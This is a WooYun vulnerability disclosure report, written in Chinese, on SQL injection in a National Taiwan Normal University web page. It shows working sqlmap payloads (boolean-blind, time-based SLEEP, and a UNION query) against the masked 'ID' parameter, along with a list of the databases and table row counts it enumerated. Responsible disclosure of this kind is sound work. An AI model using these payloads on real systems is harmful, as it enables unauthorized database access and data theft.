当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163006

漏洞标题:國立臺灣師範大學某站sql注入(臺灣地區)

相关厂商:國立臺灣師範大學

漏洞作者: 路人甲

提交时间:2015-12-21 12:44

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

RT

详细说明:

注入点:http://**.**.**.**/wlsh/glink/show.php?ID=5

[20:11:38] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://**.**.**.**/spc/'. Do you want to follo
w? [Y/n] y
sqlmap got a refresh request (redirect like response common to login pages). Do
you want to apply the refresh from now on (or stay on the original page)? [Y/n]
y
[20:12:10] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=5 AND 7805=7805
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))ctFN)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: ID=-6285 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a707871,0
x44557842636d72516d4a5167586e626d4f4173594958445352695a4350666e5176726a4e6449774
8,0x7170786a71),NULL-- -
---
[20:12:12] [INFO] testing MySQL
[20:12:12] [INFO] confirming MySQL
[20:12:12] [INFO] the back-end DBMS is MySQL

漏洞证明:

available databases [15]:
[*] chsh_school
[*] cyshDB
[*] dyna
[*] giftedDB
[*] information_schema
[*] joomDB
[*] myDB
[*] mysql
[*] pfnDB
[*] sciDB
[*] scienceDB
[*] test
[*] voteDB
[*] webHD
[*] wlshDB


Database: scienceDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 268 |
| personalTB | 241 |
| fillTB | 239 |
| qNaireTB | 238 |
| linkTB | 108 |
| itemTB | 72 |
| gbook | 8 |
+---------------------------------------+---------+
Database: giftedDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 643 |
| personalTB | 643 |
| fillTB | 642 |
| qNaireTB | 642 |
| qnTest | 642 |
| linkTB | 100 |
| itemTB | 73 |
| teacherTB | 20 |
| gbook | 9 |
+---------------------------------------+---------+
Database: pfnDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pfn_arquivos | 4 |
| pfn_arquivos_campos_palabras | 3 |
| pfn_configuracions | 3 |
| pfn_palabras | 3 |
| pfn_campos | 2 |
| pfn_accesos | 1 |
| pfn_bloqueo_ip | 1 |
| pfn_directorios | 1 |
| pfn_grupos | 1 |
| pfn_raices | 1 |
| pfn_raices_grupos_configuracions | 1 |
| pfn_raices_usuarios | 1 |
| pfn_sesions | 1 |
| pfn_usuarios | 1 |
+---------------------------------------+---------+
Database: chsh_school
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| memberTB | 311 |
| groups | 48 |
| courseTB | 13 |
+---------------------------------------+---------+
Database: joomDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| jos_content | 45 |
| jos_modules | 40 |
| jos_components | 32 |
| jos_modules_menu | 32 |
| jos_plugins | 32 |
| jos_menu | 30 |
| jos_categories | 22 |
| jos_poll_data | 12 |
| jos_core_acl_aro_groups | 11 |
| jos_poll_date | 11 |
| jos_banner | 8 |
| jos_newsfeeds | 8 |
| jos_session | 8 |
| jos_menu_types | 7 |
| jos_weblinks | 6 |
| jos_groups | 3 |
| jos_sections | 3 |
| jos_core_acl_aro | 2 |
| jos_core_acl_groups_aro_map | 2 |
| jos_templates_menu | 2 |
| jos_users | 2 |
| jos_bannerclient | 1 |
| jos_contact_details | 1 |
| jos_content_frontpage | 1 |
| jos_core_acl_aro_sections | 1 |
| jos_polls | 1 |
+---------------------------------------+---------+
Database: webHD
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| webhd_user | 2 |
| webhd_file | 1 |
+---------------------------------------+---------+
Database: cyshDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 384 |
| fillTB | 384 |
| qNaireTB | 384 |
| qnTest | 384 |
| personalTB | 383 |
| linkTB | 100 |
| itemTB | 73 |
| gbook | 5 |
+---------------------------------------+---------+
Database: sciDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 643 |
| personalTB | 643 |
| fillTB | 642 |
| qNaireTB | 642 |
| qnTest | 642 |
| linkTB | 100 |
| itemTB | 73 |
| teacherTB | 20 |
| gbook | 9 |
+---------------------------------------+---------+
Database: dyna
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| dyna_msg | 5817 |
| dyna_album | 1610 |
| dyna_schedule | 883 |
| dyna_web_area | 572 |
| dyna_menu | 556 |
| dyna_media | 342 |
| dyna_files | 207 |
| dyna_template | 166 |
| dyna_news | 93 |
| dyna_pub | 79 |
| dyna_video | 74 |
| dyna_netlink | 55 |
| dyna_member | 53 |
| dyna_user | 53 |
| dyna_modfiles | 52 |
| dyna_imglink | 51 |
| dyna_modvideo | 51 |
| dyna_web | 50 |
| dyna_modnews | 47 |
| dyna_modpub | 45 |
| dyna_modmsg | 43 |
| dyna_counter | 42 |
| dyna_modalbum | 42 |
| dyna_moddiscuss | 42 |
| dyna_modmenu | 42 |
| dyna_modnetlink | 42 |
| dyna_modschedule | 42 |
| dyna_modvote | 42 |
| dyna_discuss_forums | 21 |
| dyna_item | 15 |
| dyna_discuss_topics | 10 |
| dyna_guest | 4 |
| dyna_vote | 2 |
| dyna_post_check | 1 |
| dyna_setup | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 809 |
| help_topic | 466 |
| help_keyword | 395 |
| help_category | 36 |
| `user` | 3 |
| db | 2 |
+---------------------------------------+---------+
Database: wlshDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 311 |
| fillTB | 310 |
| personalTB | 310 |
| qNaireTB | 310 |
| qnTest | 310 |
| linkTB | 100 |
| itemTB | 73 |
| gbook | 4 |
+---------------------------------------+---------+
Database: voteDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| poll_templates | 39 |
| poll_data | 20 |
| poll_templateset | 5 |
| poll_index | 3 |
| poll_comment | 1 |
| poll_config | 1 |
| poll_log | 1 |
| poll_user | 1 |
+---------------------------------------+---------+
Database: myDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| macTB | 22 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3313 |
| STATISTICS | 307 |
| KEY_COLUMN_USAGE | 214 |
| TABLES | 185 |
| TABLE_CONSTRAINTS | 176 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| USER_PRIVILEGES | 75 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 28 |
| SCHEMATA | 15 |
+---------------------------------------+---------+


不深入,望重视

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-23 04:22

厂商回复:

感謝通報

最新状态:

暂无